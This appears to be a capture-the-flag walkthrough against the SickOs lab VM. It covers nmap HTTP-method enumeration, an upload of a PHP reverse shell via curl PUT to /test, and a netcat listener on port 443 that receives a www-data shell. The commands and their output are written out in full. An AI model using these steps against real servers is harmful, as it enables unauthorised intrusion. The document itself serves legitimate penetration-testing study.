Getting back to SickOs, we left off last time after finding that there’s a /test URL that gives a directory listing, but it’s empty. After doing some research, one of the prudent things we could do is test to see what kind of HTTP methods are supported for this particular path. We could do this manually, but nmap actually has a script which can enumerate the methods for us.
root@kali:~# nmap --script http-methods --script-args http-methods.test-all,http-methods.url-path='/test' 192.168.42.132
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-26 18:42 EDT
Nmap scan report for 192.168.42.132
Host is up (0.00054s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods:
| Supported Methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK GET HEAD POST OPTIONS
| Potentially risky methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK
|_ Path tested: /test
MAC Address: 00:0C:29:29:E3:17 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 24.96 seconds
root@kali:~#
The “Potentially risky methods” line should probably catch our attention immediately. More specifically, PUT is listed as a supported method. We should, in theory, be able to use this to upload files to the server. Rather than write our own, we’re going to cheat and download a reverse php shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell . After replacing the appropriate variables inside the script (I had to enter my IP, but I kept the port of 1234), we use the curl utility to upload it to the server.
curl -H Expect: -T ./php-reverse-shell.php http://192.168.42.132/test/reverse.php -v -0
* Trying 192.168.42.132...
* TCP_NODELAY set
* Connected to 192.168.42.132 (192.168.42.132) port 80 (#0)
> PUT /test/reverse.php HTTP/1.0
> Host: 192.168.42.132
> User-Agent: curl/7.52.1
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Length: 0
< Connection: close
< Date: Tue, 26 Sep 2017 23:46:25 GMT
< Server: lighttpd/1.4.28
<
* Curl_http_done: called premature == 0
* Closing connection 0
Now lets start netcat listening on our box and then invoke the page on the server.
root@kali:~/php-reverse-shell-1.0# nc -l -p 1234
But nothing happens…
It becomes apparent that there must be some firewall settings that are blocking outgoing traffic. I ended up trying a couple of other random ports that were towards the higher end of the spectrum with no joy. I then attempted port 80, and when that failed 443.
root@kali:~/php-reverse-shell-1.0# nc -l -p 443
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
17:51:53 up 18 min, 0 users, load average: 0.00, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
We now have a shell, and it appears to be running as www-data, which in my experience is what webservers generally run as. Next time, we’ll do some local enumeration and try to figure out how we can esclate.